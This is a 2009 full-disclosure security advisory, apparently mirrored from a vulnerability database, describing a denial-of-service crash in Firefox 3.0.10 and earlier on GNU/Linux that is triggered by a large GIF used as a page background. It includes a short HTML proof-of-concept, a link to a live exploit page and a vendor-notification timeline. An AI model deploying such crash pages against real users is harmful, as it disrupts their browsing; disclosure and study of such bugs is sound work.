Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21998
HistoryJun 11, 2009 - 12:00 a.m.

[ECHO_ADV_110$2009] Firefox (GNU/Linux version) <= 3.0.10 Denial Of Services

2009-06-1100:00:00
vulners.com
22

\_ /\ ___ \ / | \\_ \
| ) / \ \// ~ \/ | \
| \\ \
\ Y / | \
/
_____ / \______ /\| /\_____ /
\/ \/ \/ \/ .OR.ID
ECHO_ADV_110$2009


[ECHO_ADV_110$2009] Firefox (GNU/Linux version) <= 3.0.10 Denial Of Services

Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : June, 4th 2009
Location : Indonesia, Jakarta
web : http://e-rdc.org/v1/news.php?readmore=137
Critical Lvl : Moderated
Impact : Browser will automatically shutdown
Where : From Remote
Disclosure Policy: Full Disclosure Policy (RFPolicy) v2.0
http://www.wiretrip.net/rfp/policy.html

Affected software description:

Firefox is a popular Internet browser from the Mozilla Corporation. 

Application     : Firefox for GNU/linux
version         : Firefox/3.0.10 &#40;X11; Linux i686; U; en&#41;
                  Also affected for lower version &#40;tested for version 3.0.8 at
                  Ubuntu 9.0.4&#41;
                        
URL             : http://firefox.com
Bugzilla entry  : https://bugzilla.mozilla.org/show_bug.cgi?id=496265

Description     :

Firefox 3.0.10 &#40;previous version&#41; for GNU/Linux Operating systems are unable to 
handle big size of GIF images rendering when it becomes a body backgrounds. 
Just use a random size GIF files will crash firefox because of HTML body tag.

--------------------------------------------------------------------------------

Exploit Code:
~~~~~~~~~~~~~~~~

&lt;!-- Firefox 3.0.10 DOS exploit, discovered by 
     Ahmad Muammar W.K &#40;y3dips[at]echo[dot]or[dot]id&#41; 
     http://y3dips.echo.or.id
//--&gt;

&lt;html&gt;

&lt;head&gt;

&lt;title&gt;Firefox Exploit&lt;/title&gt;

&lt;body background=&quot;exploit.gif&quot;&gt;

&lt;/body&gt;

&lt;/html&gt;


live exploit :

http://y3dips.echo.or.id/tempe/ff310expl/

--------------------------------------------------------------------------------

Timeline:
~~~~~~~~~

- 20 - 05 - 2009 bug found
- 04 - 06 - 2009 vendor contacted and adding entry to bugzilla
- 04 - 06 - 2009 vendor response, and there&#96;s a potential patch
- 09 - 06 - 2009 advisory release

--------------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ my family &#40;ana my wife and ali my son&#41;

~ the_day, K-159, negative, hero, az001, rey, and also all echo staff
~ janex vind &quot;waraxe&quot;, str0ke, chopstick
~ newbie_hacker[at]yahoogroups.com
~ #e-c-h-o @irc.dal.net

--------------------------------------------------------------------------------
Contact:
~~~~~~~~

     y3dips || echo|staff || y3dips[at]echo[dot]or[dot]id
     Homepage: http://y3dips.echo.or.id/

-------------------------------- [ EOF ] ---------------------------------------